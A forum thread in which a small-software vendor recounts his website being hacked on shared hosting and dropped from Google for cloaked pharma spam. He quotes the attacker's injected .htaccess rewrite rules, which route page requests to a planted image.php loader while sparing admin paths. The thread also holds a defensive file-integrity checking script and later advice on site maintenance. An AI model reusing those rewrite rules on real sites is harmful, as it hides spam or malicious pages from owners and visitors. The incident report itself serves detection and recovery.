Unofficial empeg BBS


#346564 - 23/07/2011 12:21 Site dropped from Google - due to server compromise
hybrid8
carpal tunnel

Registered: 12/11/2001
Posts: 7738
Loc: Toronto, CANADA
I dropped into my Google Analytics yesterday which I hadn't done in a long time - since May. To my surprise I found that search traffic to the site had dropped from about 30% of all visits to under 3%. An alarm bell went off immediately.

Along with this alarm bell I started thinking about my sales and how this could explain a shift in purchasing patterns I've been noticing. Meanwhile, I logged into Webmaster Tools to find two messages waiting for me letting me know that my site had been dropped from Google's index on June 6. Arrrgh!

They claim it's because my site was being used for cloaked content, and quite specifically pharma content. They list a bunch of the terms they claim came from a certain page on the site. They also list a bunch of search queries that supposedly were used to access the site, like "xanax," etc.

The problem is that NONE of this matches what's reported by Analytics. There it doesn't show any suspect keywords having brought visitors to my site ever. Not even a single keyword match for a single visit.

Now, what I don't doubt is that the files on my site were compromised at some point. On June 7, while uploading some pages to my site, I discovered an anomaly which led me to discover that a couple of files had been altered and that a couple of files were present which did not belong on the site.

All HTML/PHP pages seemed to be intact and without illegal modification. There was an extra file sitting in my images folder and I believe my downloads folder. The HTACCESS file for the root had been changed and referenced these other folders.

A few days later I received a message from a vigilant customer who said he'd received spam at an address he had constructed specifically for my online store three years ago. The address was in a database on my site. The database doesn't really contain any other information except a mailing record to track the physical packages that were sent. Anyway, more about that later or in another thread. Bottom line is this confirmed someone had been through the site in one way or another.

I re-upped all the pages from my local copy, changed absolutely all passwords remotely associated with the site and contacted Dreamhost customer support. They didn't find any unauthorized logins through any of my domains, which leads me to think someone came in via their servers after having compromised someone else's site on the shared host.

I'm kicking myself in the ass for not having noticed or checked immediately the Google stuff, since while they seem to send me emails 5 times per day about Apps transitions, they never send any about this kind of thing. Right now I'm trying to figure out how to consolidate some of my Google accounts so I can better manage email from them. Anyone know if I can transfer my Webmaster Tools ownership from one Google account to another?

I have to run right now so I'll be back a bit later with more info and some questions for Google and web security gurus...



Edited by hybrid8 (23/07/2011 19:15)
_________________________
Bruno
Twisted Melon : Fine Mac OS Software

#346565 - 23/07/2011 15:45 Re: Site dropped from Google [Re: hybrid8]
hybrid8
carpal tunnel

Registered: 12/11/2001
Posts: 7738
Loc: Toronto, CANADA
Below is what was changed in my .htaccess file, denoted between the hashes (#######)

Code:

<Files .htaccess>
order allow,deny
deny from all
</Files>

Options -Indexes
Options +FollowSymLinks

RewriteEngine On
RewriteCond %{HTTP_HOST} ^www\.domain\.com$ [NC]
RewriteRule ^(.*)$ http://domain.com/$1 [R=301,L]

###########

RewriteRule image.php - [L]
RewriteCond %{REQUEST_METHOD} (GET|POST)
RewriteCond %{SERVER_PORT} 80
RewriteCond %{REQUEST_URI} !(login|auth|register|secure|admin|config.|style.|mod_php.|image.) [NC]
RewriteCond %{HTTP:servers}	!(true)
RewriteRule .*\.(pl|php|html|phtml|htm) /images/image.php [L,NC]

###########

ErrorDocument 404 /404.html
ErrorDocument 403 /404.html




The image.php file is fairly large with all text on one line without any breaks. Even if I hard wrap it, it's too long to post here easily. If anyone can help with looking at this file to give me an idea of what it does and especially how I can make sure that my site is protected for the future, I'm all ears and I can forward that file as an attachment or put it up somewhere for download zipped.


Edited by hybrid8 (23/07/2011 15:48)
_________________________
Bruno
Twisted Melon : Fine Mac OS Software

#346566 - 23/07/2011 15:54 Re: Site dropped from Google [Re: hybrid8]
hybrid8
carpal tunnel

Registered: 12/11/2001
Posts: 7738
Loc: Toronto, CANADA
Ok, I found the pharma references. There were two fake jpg images in my images folder, both of them containing text. The first has portions of my site, links to my shop, etc. The second has all the pharma terms.

The files were named umenu2.jpg and mailto1.jpg

The compromised files were all dated May 28 2011.

I'm not sure what the purpose of these files was, since their contents weren't visible to normal visitors. I continued to visit the site regularly during the affected week and no one reported seeing anything strange. Google claims the content was exposed to its search engines (only?).


Edited by hybrid8 (24/07/2011 11:29)
_________________________
Bruno
Twisted Melon : Fine Mac OS Software

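The two findings in this thread, an edited .htaccess and text files dressed up as .jpg images, are both catchable with a file-integrity check run against a known-good copy of the site. The Python script below is an added example, not code from the thread or from Dreamhost: it builds a SHA-256 manifest of a web root, reports modified, added and removed files on a later run, and separately flags any file with an image extension whose first bytes are not that format's signature. The MAGIC table, the demo() scenario and the file contents it writes are constructed for the example; the file names umenu2.jpg and mailto1.jpg are the ones reported in the post.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# Leading bytes a genuine file of each extension starts with (constructed table).
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map each file's path relative to root to its SHA-256; take this from a clean copy."""
    return {str(p.relative_to(root)).replace(os.sep, "/"): sha256_of(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def fake_image(path: Path) -> bool:
    """True when a file with an image extension does not start with that format's signature."""
    sigs = MAGIC.get(path.suffix.lower())
    if not sigs:
        return False
    with path.open("rb") as f:
        head = f.read(8)
    return not any(head.startswith(s) for s in sigs)


def audit(root: Path, manifest: dict) -> dict:
    """Compare a live web root against the saved manifest and group the findings."""
    current = build_manifest(root)
    return {
        "modified": sorted(k for k in current if k in manifest and current[k] != manifest[k]),
        "added": sorted(k for k in current if k not in manifest),
        "removed": sorted(k for k in manifest if k not in current),
        "fake_images": sorted(k for k in current if fake_image(root / k)),
    }


def demo() -> dict:
    """Constructed scenario: a clean site, then an .htaccess edit and two text files named .jpg."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "images").mkdir()
        (root / ".htaccess").write_text("Options -Indexes\nRewriteEngine On\n")
        (root / "index.html").write_text("<html>shop</html>")
        (root / "images" / "logo.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 16)
        manifest = build_manifest(root)  # baseline from the known-good upload

        # Simulated compromise (constructed): a rewrite line appended, two fake images dropped
        (root / ".htaccess").write_text(
            "Options -Indexes\nRewriteEngine On\nRewriteRule .*\\.php /images/image.php [L]\n")
        (root / "images" / "umenu2.jpg").write_text("<a href='/shop'>shop</a> copied site text")
        (root / "images" / "mailto1.jpg").write_text("constructed pharma-spam keyword list")
        return audit(root, manifest)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

In practice the manifest is generated from the local copy that gets uploaded and stored off the server, and the audit is run from cron so an unexpected "modified: ['.htaccess']" arrives by mail the day it happens rather than weeks later via a search-traffic graph. The signature check is deliberately separate from the hash comparison: a fake image that was present when the baseline was taken would otherwise look "unchanged".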
#346567 - 23/07/2011 17:17 Re: Site dropped from Google [Re: hybrid8]
hybrid8
carpal tunnel

Registered: 12/11/2001
Posts: 7738
Loc: Toronto, CANADA
Interesting... Do a google search for

umenu2.jpg and mailto1.jpg

Lots of hacked sites at Dreamhost.. Oh Oh... Sending them info now.
_________________________
Bruno
Twisted Melon : Fine Mac OS Software

#346570 - 23/07/2011 23:04 Re: Site dropped from Google [Re: hybrid8]
msaeger
carpal tunnel

Registered: 23/09/2000
Posts: 3608
Loc: Minnetonka, MN
Hope you don't lose too many sales while this is getting fixed.
_________________________

Matt

#346572 - 24/07/2011 00:19 Re: Site dropped from Google [Re: msaeger]
hybrid8
carpal tunnel

Registered: 12/11/2001
Posts: 7738
Loc: Toronto, CANADA
Too late on the lost sales.. I know it's affected my sales, I just don't know by how much other than a rough estimate. But I think it's been significant.
_________________________
Bruno
Twisted Melon : Fine Mac OS Software

#346574 - 24/07/2011 03:00 Re: Site dropped from Google [Re: hybrid8]
RobotCaleb
pooh-bah

Registered: 15/01/2002
Posts: 1866
Loc: Austin
Post it so someone can take a look at it when they get a chance.

#346575 - 24/07/2011 11:33 Re: Site dropped from Google [Re: RobotCaleb]
hybrid8
carpal tunnel

Registered: 12/11/2001
Posts: 7738
Loc: Toronto, CANADA
Zip file with the hacked files here: http://mypocket.com/Hackedfiles.zip
_________________________
Bruno
Twisted Melon : Fine Mac OS Software

#346576 - 24/07/2011 15:00 Re: Site dropped from Google [Re: hybrid8]
hybrid8
carpal tunnel

Registered: 12/11/2001
Posts: 7738
Loc: Toronto, CANADA
Site back in Google's index as of today. I don't know if it has anything to do with my request to re-add or if it was already previously scheduled to come back at this time. Whatever the case, PHEW!
_________________________
Bruno
Twisted Melon : Fine Mac OS Software

#346668 - 01/08/2011 15:06 Re: Site dropped from Google [Re: hybrid8]
DWallach
carpal tunnel

Registered: 30/04/2000
Posts: 3810
To the extent that I can draw a conclusion about this, it's that running your own web site, much like running your own email server, is no longer fire-and-forget. Now you have to be continuously worrying about the latest security issue, installing patches regularly, etc., or you need to outsource to somebody else who will do it for you.

And, as it happens, I've got a bunch of web sites that prior grad students set up with WordPress that have been running largely on autopilot for years. I'm now trying to transition these to being "professionally" maintained by our university IT staff for precisely these reasons.
